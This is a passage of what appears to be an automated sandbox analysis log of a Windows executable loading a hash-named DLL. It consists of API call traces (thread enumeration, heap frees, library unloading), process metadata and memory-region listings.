(hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.116] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.117] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.117] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.118] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.119] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.120] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.120] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.121] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.122] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.123] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.124] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.124] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.125] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.127] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.128] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.128] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.129] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.130] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.131] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.131] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.132] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.133] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.134] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.135] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.135] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.136] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.272] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.273] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.273] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.274] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.277] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.278] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.278] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.279] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.280] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.280] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.281] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.281] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.282] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.282] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.283] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.283] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.284] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.284] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.285] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.285] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.286] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.286] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.287] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.287] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.288] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.289] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.289] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.290] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.290] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.291] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.291] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.292] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.292] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.293] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.293] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.294] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.295] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.295] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.296] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.297] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.297] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.298] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.299] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.299] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.300] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.300] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.301] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.307] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.307] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.308] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.309] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.309] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.310] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.310] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.311] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.311] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.312] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.312] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.313] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.313] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.314] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.314] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.446] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.446] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.447] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.447] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.448] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.448] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.449] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.449] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.450] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.451] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.451] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.452] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.452] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.453] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.453] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.454] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.454] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.455] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.455] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.456] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.456] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.457] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.458] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.458] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.459] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.459] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.460] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.460] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.461] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.461] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.462] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.463] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.463] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.464] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.464] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.465] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.465] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0145.637] OpenThread (dwDesiredAccess=0x100000, bInheritHandle=0, dwThreadId=0x1088) returned 0x17c [0145.637] WaitForSingleObject (hHandle=0x17c, dwMilliseconds=0xffffffff) returned 0x0 [0170.654] CloseHandle (hObject=0x17c) returned 1 [0170.654] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x17c [0170.682] Thread32First (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.876] FreeLibrary (hLibModule=0x7ffc45e90000) returned 1 [0172.881] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0172.881] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0172.881] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0172.881] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0172.882] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0172.882] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0172.883] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4470f0 | out: hHeap=0x430000) returned 1 [0172.883] RtlInterlockedFlushSList (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) returned 0x0 [0172.883] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x43b260 | out: hHeap=0x430000) returned 1 [0172.883] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x434b40 | out: hHeap=0x430000) returned 1 [0172.883] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x434b80 | out: hHeap=0x430000) returned 1 [0172.884] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x440630 | out: hHeap=0x430000) returned 1 [0172.884] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x434bc0 | out: hHeap=0x430000) returned 1 [0172.884] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x434c00 | out: hHeap=0x430000) returned 1 [0172.884] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x43b7d0 | out: hHeap=0x430000) returned 1 [0172.884] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x433fb0 | out: hHeap=0x430000) returned 1 [0172.884] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x43b860 | out: hHeap=0x430000) returned 1 [0172.884] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x433eb0 | out: hHeap=0x430000) returned 1 [0172.884] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x439900 | out: hHeap=0x430000) returned 1 [0172.884] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x434090 | out: hHeap=0x430000) returned 1 [0172.884] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4325f0 | out: hHeap=0x430000) returned 1 [0172.884] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x433ef0 | out: hHeap=0x430000) returned 1 [0172.884] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x440720 | out: hHeap=0x430000) returned 1 [0172.884] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x43b470 | out: hHeap=0x430000) returned 1 [0172.884] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x440220 | out: hHeap=0x430000) returned 1 [0172.884] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x433f70 | out: hHeap=0x430000) returned 1 [0172.884] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x43ba20 | out: hHeap=0x430000) returned 1 [0172.885] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x43b890 | out: hHeap=0x430000) returned 1 [0172.885] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x43b8c0 | out: hHeap=0x430000) returned 1 [0172.885] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x43ba40 | out: hHeap=0x430000) returned 1 [0172.885] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x43b920 | out: hHeap=0x430000) returned 1 [0172.885] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x43ba80 | out: hHeap=0x430000) returned 1 [0172.885] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x438d00 | out: hHeap=0x430000) returned 1 [0172.885] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x438d20 | out: hHeap=0x430000) returned 1 [0172.885] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x438d40 | out: hHeap=0x430000) returned 1 [0172.885] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x448550 | out: hHeap=0x430000) returned 1 [0172.885] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x448150 | out: hHeap=0x430000) returned 1 [0172.885] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x438d60 | out: hHeap=0x430000) returned 1 [0172.885] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x43b950 | out: hHeap=0x430000) returned 1 [0172.885] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x449280 | out: hHeap=0x430000) returned 1 [0172.885] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x43b980 | out: hHeap=0x430000) returned 1 [0172.885] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x449240 | out: hHeap=0x430000) returned 1 [0172.885] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x43a7d0 | out: hHeap=0x430000) returned 1 [0172.885] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x434400 | out: hHeap=0x430000) returned 1 [0172.888] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x445ee0 | out: hHeap=0x430000) returned 1 [0172.888] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsFree") returned 0x7ffc5c00ca20 [0172.911] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x43aca0 | out: hHeap=0x430000) returned 1 [0172.912] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x445b10 | out: hHeap=0x430000) returned 1 [0172.912] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsFree") returned 0x7ffc5c00ca20 [0172.912] FreeLibrary (hLibModule=0x7ffc5bfa0000) returned 1 [0172.912] FreeLibrary (hLibModule=0x7ffc5bfa0000) returned 1 [0172.912] FreeLibrary (hLibModule=0x7ffc5bfa0000) returned 1 [0172.912] FreeLibrary (hLibModule=0x7ffc5ecd0000) returned 1 [0172.915] LocalFree (hMem=0x439770) returned 0x0 [0172.915] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff626f50000 [0172.915] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff626f50000 [0172.915] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x441c20 | out: hHeap=0x430000) returned 1 [0172.916] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x444680 | out: hHeap=0x430000) returned 1 [0172.916] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-2", hFile=0x0, dwFlags=0x800) returned 0x7ffc5be50000 [0172.916] GetProcAddress (hModule=0x7ffc5be50000, lpProcName="AppPolicyGetProcessTerminationMethod") returned 0x0 [0172.916] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x14fe98 | out: phModule=0x14fe98) returned 0 [0172.916] ExitProcess (uExitCode=0x0) [0172.917] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x43c320 | out: hHeap=0x430000) returned 1 Thread: id = 38 os_tid = 0x1088 Process: id = "12" image_name = "giumlol.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe" page_root = "0xac06000" os_pid = "0x1148" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xcc8" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_create_compress" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1397 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1398 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1399 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1400 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 1401 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 1402 start_va = 0x170000 end_va = 0x171fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1403 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1404 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1405 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 1406 start_va = 0x7ff626f50000 end_va = 0x7ff626f77fff monitored = 1 entry_point = 0x7ff626f51e8c region_type = mapped_file name = "giumlol.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe") Region: id = 1407 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1408 start_va = 0x470000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 1409 start_va = 0x7ffc5bfa0000 end_va = 0x7ffc5c187fff monitored = 0 entry_point = 0x7ffc5bfcba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1410 start_va = 0x7ffc5ecd0000 end_va = 0x7ffc5ed7cfff monitored = 0 entry_point = 0x7ffc5ece81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1411 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1412 start_va = 0x7ff5ffed0000 end_va = 0x7ff5fffcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5ffed0000" filename = "" Region: id = 1413 start_va = 0x570000 end_va = 0x62dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1414 start_va = 0x7ffc5e960000 end_va = 0x7ffc5eab5fff monitored = 0 entry_point = 0x7ffc5e96a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1415 start_va = 0x7ffc5f540000 end_va = 0x7ffc5f6c5fff monitored = 0 entry_point = 0x7ffc5f58ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1416 start_va = 0x630000 end_va = 0x72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1417 start_va = 0x7ffc5cc80000 end_va = 0x7ffc5e1defff monitored = 0 entry_point = 0x7ffc5cde11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1418 start_va = 0x7ffc5e850000 end_va = 0x7ffc5e8ecfff monitored = 0 entry_point = 0x7ffc5e8578a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1419 start_va = 0x7ffc5bec0000 end_va = 0x7ffc5bf02fff monitored = 0 entry_point = 0x7ffc5bed4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1420 start_va = 0x7ffc5c3c0000 end_va = 0x7ffc5ca03fff monitored = 0 entry_point = 0x7ffc5c5864b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1421 start_va = 0x7ffc5f2c0000 end_va = 0x7ffc5f53cfff monitored = 0 entry_point = 0x7ffc5f394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1422 start_va = 0x7ffc5e2b0000 end_va = 0x7ffc5e3cbfff monitored = 0 entry_point = 0x7ffc5e2f02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1423 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1424 start_va = 0x7ffc5cac0000 end_va = 0x7ffc5cb29fff monitored = 0 entry_point = 0x7ffc5caf6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1425 start_va = 0x7ffc5ec20000 end_va = 0x7ffc5ecc6fff monitored = 0 entry_point = 0x7ffc5ec358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1426 start_va = 0x7ffc5e8f0000 end_va = 0x7ffc5e94afff monitored = 0 entry_point = 0x7ffc5e9038b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1427 start_va = 0x7ffc5e7b0000 end_va = 0x7ffc5e801fff monitored = 0 entry_point = 0x7ffc5e7bf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1428 start_va = 0x7ffc5be50000 end_va = 0x7ffc5be5efff monitored = 0 entry_point = 0x7ffc5be53210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1429 start_va = 0x7ffc5cb50000 end_va = 0x7ffc5cc04fff monitored = 0 entry_point = 0x7ffc5cb922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1430 start_va = 0x7ffc5be70000 end_va = 0x7ffc5bebafff monitored = 0 entry_point = 0x7ffc5be735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1431 start_va = 0x7ffc5be30000 end_va = 0x7ffc5be43fff monitored = 0 entry_point = 0x7ffc5be352e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1432 start_va = 0x7ffc5e3e0000 end_va = 0x7ffc5e522fff monitored = 0 entry_point = 0x7ffc5e408210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1433 start_va = 0x180000 end_va = 0x1b8fff monitored = 0 entry_point = 0x1812f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1434 start_va = 0x730000 end_va = 0x8b7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000730000" filename = "" Region: id = 1435 start_va = 0x7ffc5e810000 end_va = 0x7ffc5e84afff monitored = 0 entry_point = 0x7ffc5e8112f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1436 start_va = 0x8c0000 end_va = 0xa40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 1437 start_va = 0xa50000 end_va = 0x1e4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a50000" filename = "" Region: id = 1439 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 1440 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 1441 start_va = 0x1e50000 end_va = 0x1f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 1442 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1445 start_va = 0x1e50000 end_va = 0x1f0ffff monitored = 0 entry_point = 0x1e70da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1446 start_va = 0x1f30000 end_va = 0x1f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f30000" filename = "" Region: id = 1447 start_va = 0x7ffc45e90000 end_va = 0x7ffc45fd6fff monitored = 1 entry_point = 0x7ffc45f67cec region_type = mapped_file name = 